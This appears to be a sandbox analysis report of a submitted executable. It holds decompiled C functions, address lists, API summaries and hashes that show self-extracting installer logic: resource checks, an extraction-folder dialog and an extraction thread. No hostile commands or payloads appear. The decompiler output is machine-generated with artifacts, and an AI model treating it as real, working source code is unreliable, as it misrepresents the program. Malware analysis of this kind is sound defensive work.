                                                • Opcode Fuzzy Hash: 2cb79b378bdbf6d0707551eca3411c13c6c45089a7a7a68daa893c6bc2e459f8
                                                • Instruction Fuzzy Hash: 66D0C93200010CFFDB006BF1EC0CE693F28EB5821AF4F4100F319C2020CA3244528B52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E00AC3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				void* __edi;
                                                				void* _t6;
                                                				void* _t10;
                                                				int _t20;
                                                				int _t21;
                                                				int _t23;
                                                				char _t24;
                                                				long _t25;
                                                				int _t27;
                                                				int _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				int _t34;
                                                				int _t37;
                                                				int _t38;
                                                				int _t39;
                                                				void* _t42;
                                                				void* _t46;
                                                				CHAR* _t49;
                                                				void* _t58;
                                                				void* _t63;
                                                				struct HWND__* _t64;
                                                
                                                				_t64 = _a4;
                                                				_t6 = _a8 - 0x10;
                                                				if(_t6 == 0) {
                                                					_push(0);
                                                					L38:
                                                					EndDialog(_t64, ??);
                                                					L39:
                                                					__eflags = 1;
                                                					return 1;
                                                				}
                                                				_t42 = 1;
                                                				_t10 = _t6 - 0x100;
                                                				if(_t10 == 0) {
                                                					E00AC43D0(_t64, GetDesktopWindow());
                                                					SetWindowTextA(_t64, "lega");
                                                					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                					__eflags =  *0xac9a40 - _t42; // 0x3
                                                					if(__eflags == 0) {
                                                						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                					}
                                                					L36:
                                                					return _t42;
                                                				}
                                                				if(_t10 == _t42) {
                                                					_t20 = _a12 - 1;
                                                					__eflags = _t20;
                                                					if(_t20 == 0) {
                                                						_t21 = GetDlgItemTextA(_t64, 0x835, 0xac91e4, 0x104);
                                                						__eflags = _t21;
                                                						if(_t21 == 0) {
                                                							L32:
                                                							_t58 = 0x4bf;
                                                							_push(0);
                                                							_push(0x10);
                                                							_push(0);
                                                							_push(0);
                                                							L25:
                                                							E00AC44B9(_t64, _t58);
                                                							goto L39;
                                                						}
                                                						_t49 = 0xac91e4;
                                                						do {
                                                							_t23 =  *_t49;
                                                							_t49 =  &(_t49[1]);
                                                							__eflags = _t23;
                                                						} while (_t23 != 0);
                                                						__eflags = _t49 - 0xac91e5 - 3;
                                                						if(_t49 - 0xac91e5 < 3) {
                                                							goto L32;
                                                						}
                                                						_t24 =  *0xac91e5; // 0x3a
                                                						__eflags = _t24 - 0x3a;
                                                						if(_t24 == 0x3a) {
                                                							L21:
                                                							_t25 = GetFileAttributesA(0xac91e4);
                                                							__eflags = _t25 - 0xffffffff;
                                                							if(_t25 != 0xffffffff) {
                                                								L26:
                                                								E00AC658A(0xac91e4, 0x104, 0xac1140);
                                                								_t27 = E00AC58C8(0xac91e4);
                                                								__eflags = _t27;
                                                								if(_t27 != 0) {
                                                									__eflags =  *0xac91e4 - 0x5c;
                                                									if( *0xac91e4 != 0x5c) {
                                                										L30:
                                                										_t30 = E00AC597D(0xac91e4, 1, _t64, 1);
                                                										__eflags = _t30;
                                                										if(_t30 == 0) {
                                                											L35:
                                                											_t42 = 1;
                                                											__eflags = 1;
                                                											goto L36;
                                                										}
                                                										L31:
                                                										_t42 = 1;
                                                										EndDialog(_t64, 1);
                                                										goto L36;
                                                									}
                                                									__eflags =  *0xac91e5 - 0x5c;
                                                									if( *0xac91e5 == 0x5c) {
                                                										goto L31;
                                                									}
                                                									goto L30;
                                                								}
                                                								_push(0);
                                                								_push(0x10);
                                                								_push(0);
                                                								_push(0);
                                                								_t58 = 0x4be;
                                                								goto L25;
                                                							}
                                                							_t32 = E00AC44B9(_t64, 0x54a, 0xac91e4, 0, 0x20, 4);
                                                							__eflags = _t32 - 6;
                                                							if(_t32 != 6) {
                                                								goto L35;
                                                							}
                                                							_t33 = CreateDirectoryA(0xac91e4, 0);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								goto L26;
                                                							}
                                                							_push(0);
                                                							_push(0x10);
                                                							_push(0);
                                                							_push(0xac91e4);
                                                							_t58 = 0x4cb;
                                                							goto L25;
                                                						}
                                                						__eflags =  *0xac91e4 - 0x5c;
                                                						if( *0xac91e4 != 0x5c) {
                                                							goto L32;
                                                						}
                                                						__eflags = _t24 - 0x5c;
                                                						if(_t24 != 0x5c) {
                                                							goto L32;
                                                						}
                                                						goto L21;
                                                					}
                                                					_t34 = _t20 - 1;
                                                					__eflags = _t34;
                                                					if(_t34 == 0) {
                                                						EndDialog(_t64, 0);
                                                						 *0xac9124 = 0x800704c7;
                                                						goto L39;
                                                					}
                                                					__eflags = _t34 != 0x834;
                                                					if(_t34 != 0x834) {
                                                						goto L36;
                                                					}
                                                					_t37 = LoadStringA( *0xac9a3c, 0x3e8, 0xac8598, 0x200);
                                                					__eflags = _t37;
                                                					if(_t37 != 0) {
                                                						_t38 = E00AC4224(_t64, _t46, _t46);
                                                						__eflags = _t38;
                                                						if(_t38 == 0) {
                                                							goto L36;
                                                						}
                                                						_t39 = SetDlgItemTextA(_t64, 0x835, 0xac87a0);
                                                						__eflags = _t39;
                                                						if(_t39 != 0) {
                                                							goto L36;
                                                						}
                                                						_t63 = 0x4c0;
                                                						L9:
                                                						E00AC44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                						_push(0);
                                                						goto L38;
                                                					}
                                                					_t63 = 0x4b1;
                                                					goto L9;
                                                				}
                                                				return 0;
                                                			}

























                                                0x00ac321b
                                                0x00ac321e
                                                0x00ac3221
                                                0x00ac343c
                                                0x00ac343e
                                                0x00ac343f
                                                0x00ac3445
                                                0x00ac3447
                                                0x00000000
                                                0x00ac3447
                                                0x00ac3229
                                                0x00ac322a
                                                0x00ac322f
                                                0x00ac33ec
                                                0x00ac33f7
                                                0x00ac3410
                                                0x00ac3416
                                                0x00ac341d
                                                0x00ac342d
                                                0x00ac342d
                                                0x00ac3438
                                                0x00000000
                                                0x00ac3438
                                                0x00ac3237
                                                0x00ac3243
                                                0x00ac3243
                                                0x00ac3246
                                                0x00ac32ee
                                                0x00ac32f4
                                                0x00ac32f6
                                                0x00ac33d4
                                                0x00ac33d6
                                                0x00ac33db
                                                0x00ac33dc
                                                0x00ac33de
                                                0x00ac33df
                                                0x00ac3370
                                                0x00ac3372
                                                0x00000000
                                                0x00ac3372
                                                0x00ac32fc
                                                0x00ac3301
                                                0x00ac3301
                                                0x00ac3303
                                                0x00ac3304
                                                0x00ac3304
                                                0x00ac330a
                                                0x00ac330d
                                                0x00000000
                                                0x00000000
                                                0x00ac3313
                                                0x00ac3318
                                                0x00ac331a
                                                0x00ac3331
                                                0x00ac3332
                                                0x00ac333a
                                                0x00ac333d
                                                0x00ac337c
                                                0x00ac3388
                                                0x00ac338f
                                                0x00ac3394
                                                0x00ac3396
                                                0x00ac33a4
                                                0x00ac33ab
                                                0x00ac33b6
                                                0x00ac33be
                                                0x00ac33c3
                                                0x00ac33c5
                                                0x00ac3435
                                                0x00ac3437
                                                0x00ac3437
                                                0x00000000
                                                0x00ac3437
                                                0x00ac33c7
                                                0x00ac33c9
                                                0x00ac33cc
                                                0x00000000
                                                0x00ac33cc
                                                0x00ac33ad
                                                0x00ac33b4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac33b4
                                                0x00ac3398
                                                0x00ac3399
                                                0x00ac339b
                                                0x00ac339c
                                                0x00ac339d
                                                0x00000000
                                                0x00ac339d
                                                0x00ac334c
                                                0x00ac3351
                                                0x00ac3354
                                                0x00000000
                                                0x00000000
                                                0x00ac335c
                                                0x00ac3362
                                                0x00ac3364
                                                0x00000000
                                                0x00000000
                                                0x00ac3366
                                                0x00ac3367
                                                0x00ac3369
                                                0x00ac336a
                                                0x00ac336b
                                                0x00000000
                                                0x00ac336b
                                                0x00ac331c
                                                0x00ac3323
                                                0x00000000
                                                0x00000000
                                                0x00ac3329
                                                0x00ac332b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac332b
                                                0x00ac324c
                                                0x00ac324c
                                                0x00ac324f
                                                0x00ac32c8
                                                0x00ac32ce
                                                0x00000000
                                                0x00ac32ce
                                                0x00ac3251
                                                0x00ac3256
                                                0x00000000
                                                0x00000000
                                                0x00ac3271
                                                0x00ac3277
                                                0x00ac3279
                                                0x00ac3298
                                                0x00ac329d
                                                0x00ac329f
                                                0x00000000
                                                0x00000000
                                                0x00ac32b0
                                                0x00ac32b6
                                                0x00ac32b8
                                                0x00000000
                                                0x00000000
                                                0x00ac32be
                                                0x00ac3280
                                                0x00ac3289
                                                0x00ac328e
                                                0x00000000
                                                0x00ac328e
                                                0x00ac327b
                                                0x00000000
                                                0x00ac327b
                                                0x00000000

                                                APIs
                                                • LoadStringA.USER32(000003E8,00AC8598,00000200), ref: 00AC3271
                                                • GetDesktopWindow.USER32 ref: 00AC33E2
                                                • SetWindowTextA.USER32(?,lega), ref: 00AC33F7
                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00AC3410
                                                • GetDlgItem.USER32(?,00000836), ref: 00AC3426
                                                • EnableWindow.USER32(00000000), ref: 00AC342D
                                                • EndDialog.USER32(?,00000000), ref: 00AC343F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$lega
                                                • API String ID: 2418873061-3269709190
                                                • Opcode ID: 79f983bc294f9c62fecb899edbd949110ee5be0659990d76778ea94ac8436063
                                                • Instruction ID: 0eed8c0c5f6634439fcfa943ac7ac2041c38e518cfc307ed47ad4cc2ab4f1911
                                                • Opcode Fuzzy Hash: 79f983bc294f9c62fecb899edbd949110ee5be0659990d76778ea94ac8436063
                                                • Instruction Fuzzy Hash: 44516B32340284BBEF659B795D4DFBB2958DB96B55F17C12CF2029A1D0CEA4CE039261
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00AC2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t13;
                                                				void* _t20;
                                                				void* _t23;
                                                				void* _t27;
                                                				struct HRSRC__* _t31;
                                                				intOrPtr _t33;
                                                				void* _t43;
                                                				void* _t48;
                                                				signed int _t65;
                                                				struct HINSTANCE__* _t66;
                                                				signed int _t67;
                                                
                                                				_t13 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t13 ^ _t67;
                                                				_t65 = 0;
                                                				_t66 = __ecx;
                                                				_t48 = __edx;
                                                				 *0xac9a3c = __ecx;
                                                				memset(0xac9140, 0, 0x8fc);
                                                				memset(0xac8a20, 0, 0x32c);
                                                				memset(0xac88c0, 0, 0x104);
                                                				 *0xac93ec = 1;
                                                				_t20 = E00AC468F("TITLE", 0xac9154, 0x7f);
                                                				if(_t20 == 0 || _t20 > 0x80) {
                                                					_t64 = 0x4b1;
                                                					goto L32;
                                                				} else {
                                                					_t27 = CreateEventA(0, 1, 1, 0);
                                                					 *0xac858c = _t27;
                                                					SetEvent(_t27);
                                                					_t64 = 0xac9a34;
                                                					if(E00AC468F("EXTRACTOPT", 0xac9a34, 4) != 0) {
                                                						if(( *0xac9a34 & 0x000000c0) == 0) {
                                                							L12:
                                                							 *0xac9120 =  *0xac9120 & _t65;
                                                							if(E00AC5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                								if( *0xac8a3a == 0) {
                                                									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                									if(_t31 != 0) {
                                                										_t65 = LoadResource(_t66, _t31);
                                                									}
                                                									if( *0xac8184 != 0) {
                                                										__imp__#17();
                                                									}
                                                									if( *0xac8a24 == 0) {
                                                										_t57 = _t65;
                                                										if(E00AC36EE(_t65) == 0) {
                                                											goto L33;
                                                										} else {
                                                											_t33 =  *0xac9a40; // 0x3
                                                											_t48 = 1;
                                                											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                												if(( *0xac9a34 & 0x00000100) == 0 || ( *0xac8a38 & 0x00000001) != 0 || E00AC18A3(_t64, _t66) != 0) {
                                                													goto L30;
                                                												} else {
                                                													_t64 = 0x7d6;
                                                													if(E00AC6517(_t57, 0x7d6, _t34, E00AC19E0, 0x547, 0x83e) != 0x83d) {
                                                														goto L33;
                                                													} else {
                                                														goto L30;
                                                													}
                                                												}
                                                											} else {
                                                												L30:
                                                												_t23 = _t48;
                                                											}
                                                										}
                                                									} else {
                                                										_t23 = 1;
                                                									}
                                                								} else {
                                                									E00AC2390(0xac8a3a);
                                                									goto L33;
                                                								}
                                                							} else {
                                                								_t64 = 0x520;
                                                								L32:
                                                								E00AC44B9(0, _t64, 0, 0, 0x10, 0);
                                                								goto L33;
                                                							}
                                                						} else {
                                                							_t64 =  &_v268;
                                                							if(E00AC468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                								goto L3;
                                                							} else {
                                                								_t43 = CreateMutexA(0, 1,  &_v268);
                                                								 *0xac8588 = _t43;
                                                								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                									goto L12;
                                                								} else {
                                                									if(( *0xac9a34 & 0x00000080) == 0) {
                                                										_t64 = 0x524;
                                                										if(E00AC44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                											goto L12;
                                                										} else {
                                                											goto L11;
                                                										}
                                                									} else {
                                                										_t64 = 0x54b;
                                                										E00AC44B9(0, 0x54b, "lega", 0, 0x10, 0);
                                                										L11:
                                                										CloseHandle( *0xac8588);
                                                										 *0xac9124 = 0x800700b7;
                                                										goto L33;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						L3:
                                                						_t64 = 0x4b1;
                                                						E00AC44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                						 *0xac9124 = 0x80070714;
                                                						L33:
                                                						_t23 = 0;
                                                					}
                                                				}
                                                				return E00AC6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                			}



















                                                0x00ac2cb5
                                                0x00ac2cbc
                                                0x00ac2cc7
                                                0x00ac2cc9
                                                0x00ac2cd1
                                                0x00ac2cd3
                                                0x00ac2cd9
                                                0x00ac2ce9
                                                0x00ac2cf9
                                                0x00ac2d0e
                                                0x00ac2d15
                                                0x00ac2d1c
                                                0x00ac2ef3
                                                0x00000000
                                                0x00ac2d2d
                                                0x00ac2d34
                                                0x00ac2d3b
                                                0x00ac2d40
                                                0x00ac2d48
                                                0x00ac2d59
                                                0x00ac2d84
                                                0x00ac2e1f
                                                0x00ac2e1f
                                                0x00ac2e2e
                                                0x00ac2e41
                                                0x00ac2e5a
                                                0x00ac2e62
                                                0x00ac2e6c
                                                0x00ac2e6c
                                                0x00ac2e75
                                                0x00ac2e77
                                                0x00ac2e77
                                                0x00ac2e84
                                                0x00ac2e8b
                                                0x00ac2e94
                                                0x00000000
                                                0x00ac2e96
                                                0x00ac2e96
                                                0x00ac2e9e
                                                0x00ac2ea2
                                                0x00ac2eba
                                                0x00000000
                                                0x00ac2ece
                                                0x00ac2ede
                                                0x00ac2eed
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac2eed
                                                0x00ac2eef
                                                0x00ac2eef
                                                0x00ac2eef
                                                0x00ac2eef
                                                0x00ac2ea2
                                                0x00ac2e86
                                                0x00ac2e88
                                                0x00ac2e88
                                                0x00ac2e43
                                                0x00ac2e48
                                                0x00000000
                                                0x00ac2e48
                                                0x00ac2e30
                                                0x00ac2e30
                                                0x00ac2ef8
                                                0x00ac2f01
                                                0x00000000
                                                0x00ac2f01
                                                0x00ac2d8a
                                                0x00ac2d8f
                                                0x00ac2da1
                                                0x00000000
                                                0x00ac2da3
                                                0x00ac2dae
                                                0x00ac2db4
                                                0x00ac2dbb
                                                0x00000000
                                                0x00ac2dca
                                                0x00ac2dd3
                                                0x00ac2df5
                                                0x00ac2e02
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac2dd5
                                                0x00ac2dde
                                                0x00ac2de3
                                                0x00ac2e04
                                                0x00ac2e0a
                                                0x00ac2e10
                                                0x00000000
                                                0x00ac2e10
                                                0x00ac2dd3
                                                0x00ac2dbb
                                                0x00ac2da1
                                                0x00ac2d5b
                                                0x00ac2d5b
                                                0x00ac2d5d
                                                0x00ac2d69
                                                0x00ac2d6e
                                                0x00ac2f06
                                                0x00ac2f06
                                                0x00ac2f06
                                                0x00ac2d59
                                                0x00ac2f18

                                                APIs
                                                • memset.MSVCRT ref: 00AC2CD9
                                                • memset.MSVCRT ref: 00AC2CE9
                                                • memset.MSVCRT ref: 00AC2CF9
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
                                                  • Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
                                                  • Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
                                                  • Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
                                                  • Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
                                                  • Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF
                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC2D34
                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC2D40
                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC2DAE
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00AC2DBD
                                                • CloseHandle.KERNEL32(lega,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC2E0A
                                                  • Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
                                                  • Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lega
                                                • API String ID: 1002816675-2051202908
                                                • Opcode ID: a565e2012a388a58a702d52bb3593d22c552e73fac5746f4ff2a383a006ad0b6
                                                • Instruction ID: 3c8f99bc891c78679299712b6fa28fb1568f7c913f7c7be3bd7f033258d440ab
                                                • Opcode Fuzzy Hash: a565e2012a388a58a702d52bb3593d22c552e73fac5746f4ff2a383a006ad0b6
                                                • Instruction Fuzzy Hash: 1D51E170340305ABE724EBA59D4AFBB3AA8EB55740F07403DF942E61D1DBB88C42CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E00AC34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                				void* _t9;
                                                				void* _t12;
                                                				void* _t13;
                                                				void* _t17;
                                                				void* _t23;
                                                				void* _t25;
                                                				struct HWND__* _t35;
                                                				struct HWND__* _t38;
                                                				void* _t39;
                                                
                                                				_t9 = _a8 - 0x10;
                                                				if(_t9 == 0) {
                                                					__eflags = 1;
                                                					L19:
                                                					_push(0);
                                                					 *0xac91d8 = 1;
                                                					L20:
                                                					_push(_a4);
                                                					L21:
                                                					EndDialog();
                                                					L22:
                                                					return 1;
                                                				}
                                                				_push(1);
                                                				_pop(1);
                                                				_t12 = _t9 - 0xf2;
                                                				if(_t12 == 0) {
                                                					__eflags = _a12 - 0x1b;
                                                					if(_a12 != 0x1b) {
                                                						goto L22;
                                                					}
                                                					goto L19;
                                                				}
                                                				_t13 = _t12 - 0xe;
                                                				if(_t13 == 0) {
                                                					_t35 = _a4;
                                                					 *0xac8584 = _t35;
                                                					E00AC43D0(_t35, GetDesktopWindow());
                                                					__eflags =  *0xac8184; // 0x1
                                                					if(__eflags != 0) {
                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                					}
                                                					SetWindowTextA(_t35, "lega");
                                                					_t17 = CreateThread(0, 0, E00AC4FE0, 0, 0, 0xac8798);
                                                					 *0xac879c = _t17;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						goto L22;
                                                					} else {
                                                						E00AC44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                						_push(0);
                                                						_push(_t35);
                                                						goto L21;
                                                					}
                                                				}
                                                				_t23 = _t13 - 1;
                                                				if(_t23 == 0) {
                                                					__eflags = _a12 - 2;
                                                					if(_a12 != 2) {
                                                						goto L22;
                                                					}
                                                					ResetEvent( *0xac858c);
                                                					_t38 =  *0xac8584; // 0x0
                                                					_t25 = E00AC44B9(_t38, 0x4b2, 0xac1140, 0, 0x20, 4);
                                                					__eflags = _t25 - 6;
                                                					if(_t25 == 6) {
                                                						L11:
                                                						 *0xac91d8 = 1;
                                                						SetEvent( *0xac858c);
                                                						_t39 =  *0xac879c; // 0x0
                                                						E00AC3680(_t39);
                                                						_push(0);
                                                						goto L20;
                                                					}
                                                					__eflags = _t25 - 1;
                                                					if(_t25 == 1) {
                                                						goto L11;
                                                					}
                                                					SetEvent( *0xac858c);
                                                					goto L22;
                                                				}
                                                				if(_t23 == 0xe90) {
                                                					TerminateThread( *0xac879c, 0);
                                                					EndDialog(_a4, _a12);
                                                					return 1;
                                                				}
                                                				return 0;
                                                			}












                                                0x00ac34fb
                                                0x00ac34fe
                                                0x00ac3665
                                                0x00ac3666
                                                0x00ac3666
                                                0x00ac3668
                                                0x00ac366e
                                                0x00ac366e
                                                0x00ac3671
                                                0x00ac3671
                                                0x00ac3677
                                                0x00000000
                                                0x00ac3677
                                                0x00ac3504
                                                0x00ac3506
                                                0x00ac3507
                                                0x00ac350c
                                                0x00ac365b
                                                0x00ac365f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac3661
                                                0x00ac3512
                                                0x00ac3515
                                                0x00ac35be
                                                0x00ac35c1
                                                0x00ac35d1
                                                0x00ac35d8
                                                0x00ac35de
                                                0x00ac35f8
                                                0x00ac3617
                                                0x00ac3617
                                                0x00ac3623
                                                0x00ac3637
                                                0x00ac363d
                                                0x00ac3642
                                                0x00ac3644
                                                0x00000000
                                                0x00ac3646
                                                0x00ac3652
                                                0x00ac3657
                                                0x00ac3658
                                                0x00000000
                                                0x00ac3658
                                                0x00ac3644
                                                0x00ac351b
                                                0x00ac351d
                                                0x00ac354f
                                                0x00ac3553
                                                0x00000000
                                                0x00000000
                                                0x00ac355f
                                                0x00ac3565
                                                0x00ac357c
                                                0x00ac3581
                                                0x00ac3584
                                                0x00ac359b
                                                0x00ac35a1
                                                0x00ac35a7
                                                0x00ac35ad
                                                0x00ac35b3
                                                0x00ac35b8
                                                0x00000000
                                                0x00ac35b8
                                                0x00ac3586
                                                0x00ac3588
                                                0x00000000
                                                0x00000000
                                                0x00ac3590
                                                0x00000000
                                                0x00ac3590
                                                0x00ac3524
                                                0x00ac3535
                                                0x00ac3541
                                                0x00000000
                                                0x00ac3549
                                                0x00000000

                                                APIs
                                                • TerminateThread.KERNEL32(00000000), ref: 00AC3535
                                                • EndDialog.USER32(?,?), ref: 00AC3541
                                                • ResetEvent.KERNEL32 ref: 00AC355F
                                                • SetEvent.KERNEL32(00AC1140,00000000,00000020,00000004), ref: 00AC3590
                                                • GetDesktopWindow.USER32 ref: 00AC35C7
                                                • GetDlgItem.USER32(?,0000083B), ref: 00AC35F1
                                                • SendMessageA.USER32(00000000), ref: 00AC35F8
                                                • GetDlgItem.USER32(?,0000083B), ref: 00AC3610
                                                • SendMessageA.USER32(00000000), ref: 00AC3617
                                                • SetWindowTextA.USER32(?,lega), ref: 00AC3623
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00AC8798), ref: 00AC3637
                                                • EndDialog.USER32(?,00000000), ref: 00AC3671
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                • String ID: lega
                                                • API String ID: 2406144884-245445314
                                                • Opcode ID: 358ee9668780f231a356fb9d14110c99257c4937078b8c5a94d29e16b412fa08
                                                • Instruction ID: 19bcfabb51849828e6318d96649891634d2b7fa8198e3e6c002f9847d9668ad2
                                                • Opcode Fuzzy Hash: 358ee9668780f231a356fb9d14110c99257c4937078b8c5a94d29e16b412fa08
                                                • Instruction Fuzzy Hash: A3319132240308BFDB209FA5AC4DF7B3A79F795B05F17861DF602952A0CA758902DB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 50%
                                                			E00AC4224(char __ecx) {
                                                				char* _v8;
                                                				_Unknown_base(*)()* _v12;
                                                				_Unknown_base(*)()* _v16;
                                                				_Unknown_base(*)()* _v20;
                                                				char* _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				char _v44;
                                                				char _v48;
                                                				char _v52;
                                                				_Unknown_base(*)()* _t26;
                                                				_Unknown_base(*)()* _t28;
                                                				_Unknown_base(*)()* _t29;
                                                				_Unknown_base(*)()* _t32;
                                                				char _t42;
                                                				char* _t44;
                                                				char* _t61;
                                                				void* _t63;
                                                				char* _t65;
                                                				struct HINSTANCE__* _t66;
                                                				char _t67;
                                                				void* _t71;
                                                				char _t76;
                                                				intOrPtr _t85;
                                                
                                                				_t67 = __ecx;
                                                				_t66 = LoadLibraryA("SHELL32.DLL");
                                                				if(_t66 == 0) {
                                                					_t63 = 0x4c2;
                                                					L22:
                                                					E00AC44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                					return 0;
                                                				}
                                                				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                				_v12 = _t26;
                                                				if(_t26 == 0) {
                                                					L20:
                                                					FreeLibrary(_t66);
                                                					_t63 = 0x4c1;
                                                					goto L22;
                                                				}
                                                				_t28 = GetProcAddress(_t66, 0xc3);
                                                				_v20 = _t28;
                                                				if(_t28 == 0) {
                                                					goto L20;
                                                				}
                                                				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                				_v16 = _t29;
                                                				if(_t29 == 0) {
                                                					goto L20;
                                                				}
                                                				_t76 =  *0xac88c0; // 0x0
                                                				if(_t76 != 0) {
                                                					L10:
                                                					 *0xac87a0 = 0;
                                                					_v52 = _t67;
                                                					_v48 = 0;
                                                					_v44 = 0;
                                                					_v40 = 0xac8598;
                                                					_v36 = 1;
                                                					_v32 = E00AC4200;
                                                					_v28 = 0xac88c0;
                                                					 *0xaca288( &_v52);
                                                					_t32 =  *_v12();
                                                					if(_t71 != _t71) {
                                                						asm("int 0x29");
                                                					}
                                                					_v12 = _t32;
                                                					if(_t32 != 0) {
                                                						 *0xaca288(_t32, 0xac88c0);
                                                						 *_v16();
                                                						if(_t71 != _t71) {
                                                							asm("int 0x29");
                                                						}
